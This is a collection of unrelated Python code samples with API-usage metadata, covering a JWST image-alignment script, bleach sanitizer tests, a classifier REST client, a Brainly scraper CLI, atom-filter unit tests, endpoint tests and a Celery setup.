data_diff_sub_gauss_shifted = apply_shift(data_diff_sub_gauss,dx,dy,0.)
#
dx_check,dy_check = crosscorfit(group_template,data_diff_sub_gauss_shifted,corrboxpeak,corrboxfit)
#
print('shift results: %s %3i %3i %5i %5i %8.3f %8.3f %8.3f %8.3f' % (uncalfile,ni+1,ng+1,round(dx),round(dy),dx,dy,dx_check,dy_check))
#
data_diff_shifted = apply_shift(data_diff,dx,dy,med)
#
if (ng == 0):
#
ramp_cube_aligned[ni,ng,:,:] = data_diff_shifted
#
else:
#
ramp_cube_aligned[ni,ng,:,:] = ramp_cube_aligned[ni,ng-1,:,:] + data_diff_shifted
rampfile_aligned = rampfile[:-10] + '_aligned_ramp.fits'
#
a = os.system('/bin/rm -f '+rampfile_aligned)
a = os.system('/bin/cp -p '+rampfile+' '+rampfile_aligned)
#
f = fits.open(rampfile_aligned,'update')
#
f[1].data = ramp_cube_aligned
#
f.flush()
f.close()
#
caldetector1_output_jumpstep = JumpStep.call(rampfile_aligned, save_results=False)
caldetector1_output_rampfit = RampFitStep.call(caldetector1_output_jumpstep, save_results=False)
caldetector1_output_gainscale0 = GainScaleStep.call(caldetector1_output_rampfit[0], save_results=False)
caldetector1_output_gainscale1 = GainScaleStep.call(caldetector1_output_rampfit[1], save_results=False)
#
calimage2_output0 = Image2Pipeline.call(caldetector1_output_gainscale0, save_results=True)
calimage2_output1 = Image2Pipeline.call(caldetector1_output_gainscale1, save_results=True)
|
[
"argparse.ArgumentParser",
"numpy.argmax",
"astropy.stats.sigma_clipped_stats",
"jwst.ramp_fitting.RampFitStep.call",
"scipy.signal.fftconvolve",
"scipy.ndimage.median_filter",
"numpy.full",
"jwst.pipeline.calwebb_detector1.Detector1Pipeline.call",
"jwst.pipeline.Image2Pipeline.call",
"astropy.io.fits.getdata",
"scipy.ndimage.gaussian_filter",
"os.path.exists",
"os.system",
"numpy.min",
"astropy.io.fits.open",
"jwst.gain_scale.GainScaleStep.call",
"sys.exit",
"astropy.modeling.models.Gaussian2D",
"jwst.jump.JumpStep.call",
"numpy.zeros",
"astropy.io.fits.getheader",
"astropy.modeling.fitting.LevMarLSQFitter",
"numpy.where"
] |
[((1422, 1510), 'scipy.signal.fftconvolve', 'scipy.signal.fftconvolve', (['data_template', 'data_to_be_shifted[::-1, ::-1]'], {'mode': '"""same"""'}), "(data_template, data_to_be_shifted[::-1, ::-1],\n mode='same')\n", (1446, 1510), False, 'import scipy\n'), ((2132, 2249), 'astropy.modeling.models.Gaussian2D', 'models.Gaussian2D', ([], {'amplitude': 'ampl', 'x_mean': 'x0fit', 'y_mean': 'y0fit', 'x_stddev': 'x_stddev0', 'y_stddev': 'y_stddev0', 'theta': '(0.0)'}), '(amplitude=ampl, x_mean=x0fit, y_mean=y0fit, x_stddev=\n x_stddev0, y_stddev=y_stddev0, theta=0.0)\n', (2149, 2249), False, 'from astropy.modeling import models, fitting\n'), ((2291, 2316), 'astropy.modeling.fitting.LevMarLSQFitter', 'fitting.LevMarLSQFitter', ([], {}), '()\n', (2314, 2316), False, 'from astropy.modeling import models, fitting\n'), ((2871, 2895), 'numpy.min', 'np.min', (['[xsigma, ysigma]'], {}), '([xsigma, ysigma])\n', (2877, 2895), True, 'import numpy as np\n'), ((2914, 3031), 'astropy.modeling.models.Gaussian2D', 'models.Gaussian2D', ([], {'amplitude': 'ampl', 'x_mean': 'x0fit', 'y_mean': 'y0fit', 'x_stddev': 'sigma_new', 'y_stddev': 'sigma_new', 'theta': '(0.0)'}), '(amplitude=ampl, x_mean=x0fit, y_mean=y0fit, x_stddev=\n sigma_new, y_stddev=sigma_new, theta=0.0)\n', (2931, 3031), False, 'from astropy.modeling import models, fitting\n'), ((3145, 3170), 'astropy.modeling.fitting.LevMarLSQFitter', 'fitting.LevMarLSQFitter', ([], {}), '()\n', (3168, 3170), False, 'from astropy.modeling import models, fitting\n'), ((4472, 4529), 'numpy.full', 'np.full', (['data_to_be_shifted.shape', 'bkgd'], {'dtype': 'np.float32'}), '(data_to_be_shifted.shape, bkgd, dtype=np.float32)\n', (4479, 4529), True, 'import numpy as np\n'), ((4993, 5003), 'sys.exit', 'sys.exit', ([], {}), '()\n', (5001, 5003), False, 'import argparse, os, sys\n'), ((6005, 6104), 'argparse.ArgumentParser', 'argparse.ArgumentParser', ([], {'description': '"""Fix shifts between groups introduced by settling issue."""'}), "(description=\n 'Fix shifts between groups introduced by settling issue.')\n", (6028, 6104), False, 'import argparse, os, sys\n'), ((6927, 6955), 'astropy.io.fits.getheader', 'fits.getheader', (['uncalfile', '(0)'], {}), '(uncalfile, 0)\n', (6941, 6955), False, 'from astropy.io import fits\n'), ((7036, 7062), 'astropy.io.fits.getdata', 'fits.getdata', (['uncalfile', '(1)'], {}), '(uncalfile, 1)\n', (7048, 7062), False, 'from astropy.io import fits\n'), ((9114, 9157), 'os.system', 'os.system', (["('/bin/rm -f ' + rampfile_aligned)"], {}), "('/bin/rm -f ' + rampfile_aligned)\n", (9123, 9157), False, 'import argparse, os, sys\n'), ((9162, 9222), 'os.system', 'os.system', (["('/bin/cp -p ' + rampfile + ' ' + rampfile_aligned)"], {}), "('/bin/cp -p ' + rampfile + ' ' + rampfile_aligned)\n", (9171, 9222), False, 'import argparse, os, sys\n'), ((9227, 9264), 'astropy.io.fits.open', 'fits.open', (['rampfile_aligned', '"""update"""'], {}), "(rampfile_aligned, 'update')\n", (9236, 9264), False, 'from astropy.io import fits\n'), ((9367, 9418), 'jwst.jump.JumpStep.call', 'JumpStep.call', (['rampfile_aligned'], {'save_results': '(False)'}), '(rampfile_aligned, save_results=False)\n', (9380, 9418), False, 'from jwst.jump import JumpStep\n'), ((9473, 9539), 'jwst.ramp_fitting.RampFitStep.call', 'RampFitStep.call', (['caldetector1_output_jumpstep'], {'save_results': '(False)'}), '(caldetector1_output_jumpstep, save_results=False)\n', (9489, 9539), False, 'from jwst.ramp_fitting import RampFitStep\n'), ((9579, 9649), 'jwst.gain_scale.GainScaleStep.call', 'GainScaleStep.call', (['caldetector1_output_rampfit[0]'], {'save_results': '(False)'}), '(caldetector1_output_rampfit[0], save_results=False)\n', (9597, 9649), False, 'from jwst.gain_scale import GainScaleStep\n'), ((9685, 9755), 'jwst.gain_scale.GainScaleStep.call', 'GainScaleStep.call', (['caldetector1_output_rampfit[1]'], {'save_results': '(False)'}), '(caldetector1_output_rampfit[1], save_results=False)\n', (9703, 9755), False, 'from jwst.gain_scale import GainScaleStep\n'), ((9782, 9852), 'jwst.pipeline.Image2Pipeline.call', 'Image2Pipeline.call', (['caldetector1_output_gainscale0'], {'save_results': '(True)'}), '(caldetector1_output_gainscale0, save_results=True)\n', (9801, 9852), False, 'from jwst.pipeline import Image2Pipeline\n'), ((9875, 9945), 'jwst.pipeline.Image2Pipeline.call', 'Image2Pipeline.call', (['caldetector1_output_gainscale1'], {'save_results': '(True)'}), '(caldetector1_output_gainscale1, save_results=True)\n', (9894, 9945), False, 'from jwst.pipeline import Image2Pipeline\n'), ((1657, 1722), 'numpy.argmax', 'np.argmax', (['corr[ycen - box2:ycen + box2, xcen - box2:xcen + box2]'], {}), '(corr[ycen - box2:ycen + box2, xcen - box2:xcen + box2])\n', (1666, 1722), True, 'import numpy as np\n'), ((6779, 6803), 'os.path.exists', 'os.path.exists', (['rampfile'], {}), '(rampfile)\n', (6793, 6803), False, 'import argparse, os, sys\n'), ((6821, 6917), 'jwst.pipeline.calwebb_detector1.Detector1Pipeline.call', 'calwebb_detector1.Detector1Pipeline.call', (['uncalfile'], {'steps': 'parameter_dict', 'save_results': '(True)'}), '(uncalfile, steps=parameter_dict,\n save_results=True)\n', (6861, 6917), False, 'from jwst.pipeline import calwebb_detector1\n'), ((7088, 7108), 'numpy.zeros', 'np.zeros', (['data.shape'], {}), '(data.shape)\n', (7096, 7108), True, 'import numpy as np\n'), ((7530, 7615), 'astropy.stats.sigma_clipped_stats', 'stats.sigma_clipped_stats', (['data_diff'], {'maxiters': '(10)', 'sigma_lower': '(6.0)', 'sigma_upper': '(4)'}), '(data_diff, maxiters=10, sigma_lower=6.0,\n sigma_upper=4)\n', (7555, 7615), False, 'from astropy import stats\n'), ((7733, 7812), 'scipy.ndimage.median_filter', 'scipy.ndimage.median_filter', ([], {'input': 'data_diff', 'size': '(3)', 'mode': '"""constant"""', 'cval': '(0.0)'}), "(input=data_diff, size=3, mode='constant', cval=0.0)\n", (7760, 7812), False, 'import scipy\n'), ((7312, 7337), 'astropy.io.fits.getdata', 'fits.getdata', (['rampfile', '(1)'], {}), '(rampfile, 1)\n', (7324, 7337), False, 'from astropy.io import fits\n'), ((7890, 7925), 'numpy.where', 'np.where', (['(data_diff_sub < 5.0 * rms)'], {}), '(data_diff_sub < 5.0 * rms)\n', (7898, 7925), True, 'import numpy as np\n'), ((7967, 8063), 'scipy.ndimage.gaussian_filter', 'gaussian_filter', (['data_diff_sub'], {'sigma': '(1.0)', 'truncate': '(5.0)', 'order': '(0)', 'mode': '"""constant"""', 'cval': '(0.0)'}), "(data_diff_sub, sigma=1.0, truncate=5.0, order=0, mode=\n 'constant', cval=0.0)\n", (7982, 8063), False, 'from scipy.ndimage import gaussian_filter, median_filter\n')]
|
import html5lib
from nose.tools import eq_
import bleach
def test_empty():
eq_('', bleach.clean(''))
def test_comments_only():
comment = '<!-- this is a comment -->'
open_comment = '<!-- this is an open comment'
eq_('', bleach.clean(comment))
eq_('', bleach.clean(open_comment))
eq_(comment, bleach.clean(comment, strip_comments=False))
eq_('%s-->' % open_comment, bleach.clean(open_comment,
strip_comments=False))
def test_with_comments():
html = '<!-- comment -->Just text'
eq_('Just text', bleach.clean(html))
eq_(html, bleach.clean(html, strip_comments=False))
def test_no_html():
eq_('no html string', bleach.clean('no html string'))
def test_allowed_html():
eq_('an <strong>allowed</strong> tag',
bleach.clean('an <strong>allowed</strong> tag'))
eq_('another <em>good</em> tag',
bleach.clean('another <em>good</em> tag'))
def test_bad_html():
eq_('a <em>fixed tag</em>',
bleach.clean('a <em>fixed tag'))
def test_function_arguments():
TAGS = ['span', 'br']
ATTRS = {'span': ['style']}
eq_('a <br><span style="">test</span>',
bleach.clean('a <br/><span style="color:red">test</span>',
tags=TAGS, attributes=ATTRS))
def test_named_arguments():
ATTRS = {'a': ['rel', 'href']}
s = u'<a href="http://xx.com" rel="alternate">xx.com</a>'
eq_('<a href="http://xx.com">xx.com</a>', bleach.clean(s))
eq_(s, bleach.clean(s, attributes=ATTRS))
def test_disallowed_html():
eq_('a <script>safe()</script> test',
bleach.clean('a <script>safe()</script> test'))
eq_('a <style>body{}</style> test',
bleach.clean('a <style>body{}</style> test'))
def test_bad_href():
eq_('<em>no link</em>',
bleach.clean('<em href="fail">no link</em>'))
def test_bare_entities():
eq_('an & entity', bleach.clean('an & entity'))
eq_('an < entity', bleach.clean('an < entity'))
eq_('tag < <em>and</em> entity',
bleach.clean('tag < <em>and</em> entity'))
eq_('&', bleach.clean('&'))
def test_escaped_entities():
s = u'<em>strong</em>'
eq_(s, bleach.clean(s))
def test_serializer():
s = u'<table></table>'
eq_(s, bleach.clean(s, tags=['table']))
eq_(u'test<table></table>', bleach.linkify(u'<table>test</table>'))
eq_(u'<p>test</p>', bleach.clean(u'<p>test</p>', tags=['p']))
def test_no_href_links():
s = u'<a name="anchor">x</a>'
eq_(s, bleach.linkify(s))
eq_(s, bleach.linkify(s, nofollow=False))
def test_weird_strings():
s = '</3'
eq_(bleach.clean(s), '')
def test_xml_render():
parser = html5lib.HTMLParser()
eq_(bleach._render(parser.parseFragment('')), '')
def test_stripping():
eq_('a test <em>with</em> <b>html</b> tags',
bleach.clean('a test <em>with</em> <b>html</b> tags', strip=True))
eq_('a test <em>with</em> <b>html</b> tags',
bleach.clean('a test <em>with</em> <img src="http://example.com/"> '
'<b>html</b> tags', strip=True))
s = '<p><a href="http://example.com/">link text</a></p>'
eq_('<p>link text</p>', bleach.clean(s, tags=['p'], strip=True))
s = '<p><span>multiply <span>nested <span>text</span></span></span></p>'
eq_('<p>multiply nested text</p>', bleach.clean(s, tags=['p'], strip=True))
s = ('<p><a href="http://example.com/"><img src="http://example.com/">'
'</a></p>')
eq_('<p><a href="http://example.com/"></a></p>',
bleach.clean(s, tags=['p', 'a'], strip=True))
def test_allowed_styles():
ATTR = ['style']
STYLE = ['color']
blank = '<b style=""></b>'
s = '<b style="color: blue;"></b>'
eq_(blank, bleach.clean('<b style="top:0"></b>', attributes=ATTR))
eq_(s, bleach.clean(s, attributes=ATTR, styles=STYLE))
eq_(s, bleach.clean('<b style="top: 0; color: blue;"></b>',
attributes=ATTR, styles=STYLE))
def test_idempotent():
"""Make sure that applying the filter twice doesn't change anything."""
dirty = u'<span>invalid & </span> < extra http://link.com<em>'
clean = bleach.clean(dirty)
eq_(clean, bleach.clean(clean))
linked = bleach.linkify(dirty)
eq_(linked, bleach.linkify(linked))
def test_lowercase_html():
"""We should output lowercase HTML."""
dirty = u'<EM CLASS="FOO">BAR</EM>'
clean = u'<em class="FOO">BAR</em>'
eq_(clean, bleach.clean(dirty, attributes=['class']))
def test_wildcard_attributes():
ATTR = {
'*': ['id'],
'img': ['src'],
}
TAG = ['img', 'em']
dirty = (u'both <em id="foo" style="color: black">can</em> have '
u'<img id="bar" src="foo"/>')
clean = u'both <em id="foo">can</em> have <img id="bar" src="foo">'
eq_(clean, bleach.clean(dirty, tags=TAG, attributes=ATTR))
def test_sarcasm():
"""Jokes should crash.<sarcasm/>"""
dirty = u'Yeah right <sarcasm/>'
clean = u'Yeah right <sarcasm/>'
eq_(clean, bleach.clean(dirty))
|
[
"bleach.linkify",
"bleach.clean",
"html5lib.HTMLParser"
] |
[((2738, 2759), 'html5lib.HTMLParser', 'html5lib.HTMLParser', ([], {}), '()\n', (2757, 2759), False, 'import html5lib\n'), ((4204, 4223), 'bleach.clean', 'bleach.clean', (['dirty'], {}), '(dirty)\n', (4216, 4223), False, 'import bleach\n'), ((4274, 4295), 'bleach.linkify', 'bleach.linkify', (['dirty'], {}), '(dirty)\n', (4288, 4295), False, 'import bleach\n'), ((90, 106), 'bleach.clean', 'bleach.clean', (['""""""'], {}), "('')\n", (102, 106), False, 'import bleach\n'), ((241, 262), 'bleach.clean', 'bleach.clean', (['comment'], {}), '(comment)\n', (253, 262), False, 'import bleach\n'), ((276, 302), 'bleach.clean', 'bleach.clean', (['open_comment'], {}), '(open_comment)\n', (288, 302), False, 'import bleach\n'), ((321, 364), 'bleach.clean', 'bleach.clean', (['comment'], {'strip_comments': '(False)'}), '(comment, strip_comments=False)\n', (333, 364), False, 'import bleach\n'), ((398, 446), 'bleach.clean', 'bleach.clean', (['open_comment'], {'strip_comments': '(False)'}), '(open_comment, strip_comments=False)\n', (410, 446), False, 'import bleach\n'), ((581, 599), 'bleach.clean', 'bleach.clean', (['html'], {}), '(html)\n', (593, 599), False, 'import bleach\n'), ((615, 655), 'bleach.clean', 'bleach.clean', (['html'], {'strip_comments': '(False)'}), '(html, strip_comments=False)\n', (627, 655), False, 'import bleach\n'), ((705, 735), 'bleach.clean', 'bleach.clean', (['"""no html string"""'], {}), "('no html string')\n", (717, 735), False, 'import bleach\n'), ((815, 862), 'bleach.clean', 'bleach.clean', (['"""an <strong>allowed</strong> tag"""'], {}), "('an <strong>allowed</strong> tag')\n", (827, 862), False, 'import bleach\n'), ((909, 950), 'bleach.clean', 'bleach.clean', (['"""another <em>good</em> tag"""'], {}), "('another <em>good</em> tag')\n", (921, 950), False, 'import bleach\n'), ((1015, 1046), 'bleach.clean', 'bleach.clean', (['"""a <em>fixed tag"""'], {}), "('a <em>fixed tag')\n", (1027, 1046), False, 'import bleach\n'), ((1192, 1283), 'bleach.clean', 'bleach.clean', (['"""a <br/><span style="color:red">test</span>"""'], {'tags': 'TAGS', 'attributes': 'ATTRS'}), '(\'a <br/><span style="color:red">test</span>\', tags=TAGS,\n attributes=ATTRS)\n', (1204, 1283), False, 'import bleach\n'), ((1475, 1490), 'bleach.clean', 'bleach.clean', (['s'], {}), '(s)\n', (1487, 1490), False, 'import bleach\n'), ((1503, 1536), 'bleach.clean', 'bleach.clean', (['s'], {'attributes': 'ATTRS'}), '(s, attributes=ATTRS)\n', (1515, 1536), False, 'import bleach\n'), ((1630, 1676), 'bleach.clean', 'bleach.clean', (['"""a <script>safe()</script> test"""'], {}), "('a <script>safe()</script> test')\n", (1642, 1676), False, 'import bleach\n'), ((1738, 1782), 'bleach.clean', 'bleach.clean', (['"""a <style>body{}</style> test"""'], {}), "('a <style>body{}</style> test')\n", (1750, 1782), False, 'import bleach\n'), ((1843, 1887), 'bleach.clean', 'bleach.clean', (['"""<em href="fail">no link</em>"""'], {}), '(\'<em href="fail">no link</em>\')\n', (1855, 1887), False, 'import bleach\n'), ((1944, 1971), 'bleach.clean', 'bleach.clean', (['"""an & entity"""'], {}), "('an & entity')\n", (1956, 1971), False, 'import bleach\n'), ((1999, 2026), 'bleach.clean', 'bleach.clean', (['"""an < entity"""'], {}), "('an < entity')\n", (2011, 2026), False, 'import bleach\n'), ((2076, 2117), 'bleach.clean', 'bleach.clean', (['"""tag < <em>and</em> entity"""'], {}), "('tag < <em>and</em> entity')\n", (2088, 2117), False, 'import bleach\n'), ((2136, 2157), 'bleach.clean', 'bleach.clean', (['"""&"""'], {}), "('&')\n", (2148, 2157), False, 'import bleach\n'), ((2240, 2255), 'bleach.clean', 'bleach.clean', (['s'], {}), '(s)\n', (2252, 2255), False, 'import bleach\n'), ((2320, 2351), 'bleach.clean', 'bleach.clean', (['s'], {'tags': "['table']"}), "(s, tags=['table'])\n", (2332, 2351), False, 'import bleach\n'), ((2385, 2423), 'bleach.linkify', 'bleach.linkify', (['u"""<table>test</table>"""'], {}), "(u'<table>test</table>')\n", (2399, 2423), False, 'import bleach\n'), ((2449, 2489), 'bleach.clean', 'bleach.clean', (['u"""<p>test</p>"""'], {'tags': "['p']"}), "(u'<p>test</p>', tags=['p'])\n", (2461, 2489), False, 'import bleach\n'), ((2564, 2581), 'bleach.linkify', 'bleach.linkify', (['s'], {}), '(s)\n', (2578, 2581), False, 'import bleach\n'), ((2594, 2627), 'bleach.linkify', 'bleach.linkify', (['s'], {'nofollow': '(False)'}), '(s, nofollow=False)\n', (2608, 2627), False, 'import bleach\n'), ((2679, 2694), 'bleach.clean', 'bleach.clean', (['s'], {}), '(s)\n', (2691, 2694), False, 'import bleach\n'), ((2895, 2960), 'bleach.clean', 'bleach.clean', (['"""a test <em>with</em> <b>html</b> tags"""'], {'strip': '(True)'}), "('a test <em>with</em> <b>html</b> tags', strip=True)\n", (2907, 2960), False, 'import bleach\n'), ((3020, 3126), 'bleach.clean', 'bleach.clean', (['"""a test <em>with</em> <img src="http://example.com/"> <b>html</b> tags"""'], {'strip': '(True)'}), '(\n \'a test <em>with</em> <img src="http://example.com/"> <b>html</b> tags\',\n strip=True)\n', (3032, 3126), False, 'import bleach\n'), ((3228, 3267), 'bleach.clean', 'bleach.clean', (['s'], {'tags': "['p']", 'strip': '(True)'}), "(s, tags=['p'], strip=True)\n", (3240, 3267), False, 'import bleach\n'), ((3385, 3424), 'bleach.clean', 'bleach.clean', (['s'], {'tags': "['p']", 'strip': '(True)'}), "(s, tags=['p'], strip=True)\n", (3397, 3424), False, 'import bleach\n'), ((3585, 3629), 'bleach.clean', 'bleach.clean', (['s'], {'tags': "['p', 'a']", 'strip': '(True)'}), "(s, tags=['p', 'a'], strip=True)\n", (3597, 3629), False, 'import bleach\n'), ((3788, 3842), 'bleach.clean', 'bleach.clean', (['"""<b style="top:0"></b>"""'], {'attributes': 'ATTR'}), '(\'<b style="top:0"></b>\', attributes=ATTR)\n', (3800, 3842), False, 'import bleach\n'), ((3855, 3901), 'bleach.clean', 'bleach.clean', (['s'], {'attributes': 'ATTR', 'styles': 'STYLE'}), '(s, attributes=ATTR, styles=STYLE)\n', (3867, 3901), False, 'import bleach\n'), ((3914, 4001), 'bleach.clean', 'bleach.clean', (['"""<b style="top: 0; color: blue;"></b>"""'], {'attributes': 'ATTR', 'styles': 'STYLE'}), '(\'<b style="top: 0; color: blue;"></b>\', attributes=ATTR,\n styles=STYLE)\n', (3926, 4001), False, 'import bleach\n'), ((4239, 4258), 'bleach.clean', 'bleach.clean', (['clean'], {}), '(clean)\n', (4251, 4258), False, 'import bleach\n'), ((4312, 4334), 'bleach.linkify', 'bleach.linkify', (['linked'], {}), '(linked)\n', (4326, 4334), False, 'import bleach\n'), ((4503, 4544), 'bleach.clean', 'bleach.clean', (['dirty'], {'attributes': "['class']"}), "(dirty, attributes=['class'])\n", (4515, 4544), False, 'import bleach\n'), ((4868, 4914), 'bleach.clean', 'bleach.clean', (['dirty'], {'tags': 'TAG', 'attributes': 'ATTR'}), '(dirty, tags=TAG, attributes=ATTR)\n', (4880, 4914), False, 'import bleach\n'), ((5073, 5092), 'bleach.clean', 'bleach.clean', (['dirty'], {}), '(dirty)\n', (5085, 5092), False, 'import bleach\n')]
|
import requests
class SimpleClassifier(object):
def __init__(self, **kwargs):
self.host = kwargs.get('host', "localhost")
self.port = kwargs.get('port', 8080)
self.proto = kwargs.get('proto', "http")
self.uri = "{}://{}:{}".format(self.proto, self.host, self.port)
self.datasets = self.init_datasets()
def init_datasets(self):
return SimpleClassifier.Datasets(self)
def json_query(self, path, method, **kwargs):
r = requests.request(method, self.uri + path, json=kwargs)
return r.json()
class Datasets(object):
def __init__(self, classifier):
self.classifier = classifier
def get(self, dataset=None):
path = '/datasets'
if dataset:
path = path + '/' + dataset
result = self.classifier.json_query(path, 'GET')
return result
def create(self, name):
result = self.classifier.json_query('/datasets', 'PUT', name=name)
return result
def delete(self, name):
path = '/datasets/' + name
result = self.classifier.json_query(path, 'DELETE')
return result
def addPicture(self, dataset, **kwargs):
result = {}
urls = kwargs.get('urls', [])
label = kwargs.get('label')
path = '/datasets/' + dataset + '/' + label
if not isinstance(urls, list):
if isinstance(urls, str):
urls = [urls]
result = self.classifier.json_query(path, 'PUT', urls=urls)
return result
def train(self, dataset, **kwargs):
path = '/datasets/' + dataset + '/train'
result = self.classifier.json_query(path, 'POST', **kwargs)
return result
def classify(self, dataset, **kwargs):
path = '/datasets/' + dataset + '/label'
result = self.classifier.json_query(path, 'POST', **kwargs)
return result
|
[
"requests.request"
] |
[((492, 546), 'requests.request', 'requests.request', (['method', '(self.uri + path)'], {'json': 'kwargs'}), '(method, self.uri + path, json=kwargs)\n', (508, 546), False, 'import requests\n')]
|
from brainly_scraper import brainly
cyan = '\x1b[36m'
white = '\x1b[37m'
def start():
banners = """
{} ____ _ _
| __ ) _ __ __ _(_)_ __ | |_ _
| _ \| '__/ _` | | '_ \| | | | |
| |_) | | | (_| | | | | | | |_| |
|____/|_| \__,_|_|_| |_|_|\__, | {}Made By X-Nabil354
{} |___/ {}Brainly-CLI V1
""".format(cyan, white, cyan, white)
print(banners)
if __name__=='__main__':
start()
while True:
try:
tanya = input('{}Masukan Pertanyaan mu: {}'.format(cyan, white))
scrap = brainly(tanya, 5)
for i in scrap:
for answer in i.answers:
print('{}'.format(white)+answer.content + '{}\n\n----------------------\n\n{}'.format(cyan, white, cyan))
except KeyboardInterrupt:
print('{}\nOke Byeee....'.format(cyan))
exit()
|
[
"brainly_scraper.brainly"
] |
[((594, 611), 'brainly_scraper.brainly', 'brainly', (['tanya', '(5)'], {}), '(tanya, 5)\n', (601, 611), False, 'from brainly_scraper import brainly\n')]
|
"""
Unit tests for the atom ID filter
"""
from __future__ import absolute_import
from __future__ import unicode_literals
import unittest
import numpy as np
from ....system import lattice
from .. import atomIdFilter
from .. import base
################################################################################
class TestAtomId(unittest.TestCase):
"""
Test atom ID filter
"""
def setUp(self):
"""
Called before each test
"""
# generate lattice
self.lattice = lattice.Lattice()
self.lattice.addAtom("Au", [0,0,0], 0.0)
self.lattice.addAtom("Au", [1,0,0], 0.0)
self.lattice.addAtom("Au", [0,1,0], 0.0)
self.lattice.addAtom("Au", [0,0,1], 0.0)
self.lattice.addAtom("Au", [1,1,0], 0.0)
self.lattice.addAtom("Au", [0,1,1], 0.0)
self.lattice.addAtom("Au", [1,1,1], 0.0)
self.lattice.addAtom("Au", [2,0,0], 0.0)
self.lattice.addAtom("Au", [0,2,0], 0.0)
self.lattice.addAtom("Au", [0,0,2], 0.0)
# filter
self.filter = atomIdFilter.AtomIdFilter("Atom ID")
def tearDown(self):
"""
Called after each test
"""
# remove refs
self.lattice = None
self.filter = None
def test_atomID(self):
"""
Atom ID filter
"""
# settings
settings = atomIdFilter.AtomIdFilterSettings()
settings.updateSetting("filterString", "0")
# set PBC
self.lattice.PBC[:] = 1
# filter input
filterInput = base.FilterInput()
filterInput.inputState = self.lattice
visibleAtoms = np.arange(self.lattice.NAtoms, dtype=np.int32)
filterInput.visibleAtoms = visibleAtoms
filterInput.NScalars = 0
filterInput.fullScalars = np.empty(0, np.float64)
filterInput.NVectors = 0
filterInput.fullVectors = np.empty(0, np.float64)
filterInput.ompNumThreads = 1
# call filter
result = self.filter.apply(filterInput, settings)
self.assertIsInstance(result, base.FilterResult)
# make sure num visible is correct
self.assertEqual(len(visibleAtoms), 1)
# check position is correct
self.assertListEqual(list(self.lattice.atomPos(visibleAtoms[0])), [0,0,0])
# settings
settings = atomIdFilter.AtomIdFilterSettings()
settings.updateSetting("filterString", "1-3, 8")
# set PBC
self.lattice.PBC[:] = 1
# filter input
filterInput = base.FilterInput()
filterInput.inputState = self.lattice
visibleAtoms = np.arange(self.lattice.NAtoms, dtype=np.int32)
filterInput.visibleAtoms = visibleAtoms
filterInput.NScalars = 0
filterInput.fullScalars = np.empty(0, np.float64)
filterInput.NVectors = 0
filterInput.fullVectors = np.empty(0, np.float64)
filterInput.ompNumThreads = 1
# call filter
result = self.filter.apply(filterInput, settings)
self.assertIsInstance(result, base.FilterResult)
# make sure num visible is correct
self.assertEqual(len(visibleAtoms), 4)
# check position is correct
self.assertListEqual(list(self.lattice.atomPos(visibleAtoms[0])), [1,0,0])
self.assertListEqual(list(self.lattice.atomPos(visibleAtoms[1])), [0,1,0])
self.assertListEqual(list(self.lattice.atomPos(visibleAtoms[2])), [0,0,1])
self.assertListEqual(list(self.lattice.atomPos(visibleAtoms[3])), [0,2,0])
|
[
"numpy.empty",
"numpy.arange"
] |
[((1719, 1765), 'numpy.arange', 'np.arange', (['self.lattice.NAtoms'], {'dtype': 'np.int32'}), '(self.lattice.NAtoms, dtype=np.int32)\n', (1728, 1765), True, 'import numpy as np\n'), ((1881, 1904), 'numpy.empty', 'np.empty', (['(0)', 'np.float64'], {}), '(0, np.float64)\n', (1889, 1904), True, 'import numpy as np\n'), ((1972, 1995), 'numpy.empty', 'np.empty', (['(0)', 'np.float64'], {}), '(0, np.float64)\n', (1980, 1995), True, 'import numpy as np\n'), ((2748, 2794), 'numpy.arange', 'np.arange', (['self.lattice.NAtoms'], {'dtype': 'np.int32'}), '(self.lattice.NAtoms, dtype=np.int32)\n', (2757, 2794), True, 'import numpy as np\n'), ((2910, 2933), 'numpy.empty', 'np.empty', (['(0)', 'np.float64'], {}), '(0, np.float64)\n', (2918, 2933), True, 'import numpy as np\n'), ((3001, 3024), 'numpy.empty', 'np.empty', (['(0)', 'np.float64'], {}), '(0, np.float64)\n', (3009, 3024), True, 'import numpy as np\n')]
|
from utils import Session
def test_visuals_public_course():
student = Session("student")
# Get all course data with visuals enabled
courses_with_visuals = student.get("/public/courses/visuals-list")["courses"]
# Iterate over courses, generating visuals for each
for course in courses_with_visuals:
# Pull course id
course_id = course["id"]
# Get the course visual
usage = student.get(
f"/public/visuals/course/{course_id}",
return_request=True,
skip_verify=True,
)
# Just make sure it didn't 500
assert usage.headers['Content-Type'] == 'image/png'
assert usage.status_code == 200
def test_visuals_public_playgrounds():
student = Session("student")
# Get the course visual
usage = student.get(
f"/public/visuals/playgrounds",
return_request=True,
skip_verify=True,
)
# Just make sure it didn't 500
assert usage.headers['Content-Type'] == 'image/png'
assert usage.status_code == 200
def test_visuals_public_active():
student = Session("student")
for days, step in [(14, 1), (90, 7), (180, 1), (365, 30)]:
# Get the course visual
usage = student.get(
f"/public/visuals/active/{days}/{step}",
return_request=True,
skip_verify=True,
)
# Just make sure it didn't 500
assert usage.headers['Content-Type'] == 'image/png'
assert usage.status_code == 200
def test_visuals_public_users():
student = Session("student")
for days, step in [(365, 1), (365, 30)]:
# Get the course visual
r = student.get(
f"/public/visuals/users/{days}/{step}",
return_request=True,
skip_verify=True,
)
# Just make sure it didn't 500
print('aaa', r.content)
assert r.headers['Content-Type'] == 'image/png'
assert r.status_code == 200
|
[
"utils.Session"
] |
[((76, 94), 'utils.Session', 'Session', (['"""student"""'], {}), "('student')\n", (83, 94), False, 'from utils import Session\n'), ((762, 780), 'utils.Session', 'Session', (['"""student"""'], {}), "('student')\n", (769, 780), False, 'from utils import Session\n'), ((1114, 1132), 'utils.Session', 'Session', (['"""student"""'], {}), "('student')\n", (1121, 1132), False, 'from utils import Session\n'), ((1573, 1591), 'utils.Session', 'Session', (['"""student"""'], {}), "('student')\n", (1580, 1591), False, 'from utils import Session\n')]
|
# 从你刚刚下载的包中导入Celery类
from celery import Celery
# 利用导入的Celery创建对象
celery_app = Celery('meiduo')
celery_app.config_from_object('celery_tasks.config')
# 让celery_app自动捕获目标地址下的任务:
# 就是自动捕获tasks
celery_app.autodiscover_tasks(['celery_tasks.sms'])
|
[
"celery.Celery"
] |
[((79, 95), 'celery.Celery', 'Celery', (['"""meiduo"""'], {}), "('meiduo')\n", (85, 95), False, 'from celery import Celery\n')]
|
# ch1/example2.py
import concurrent.futures
from timeit import default_timer as timer
# sequential
def f(x):
return x * x - x + 1
start = timer()
result = 3
for i in range(20):
result = f(result)
print('Result is very large. Only printing the last 5 digits:', result % 100000)
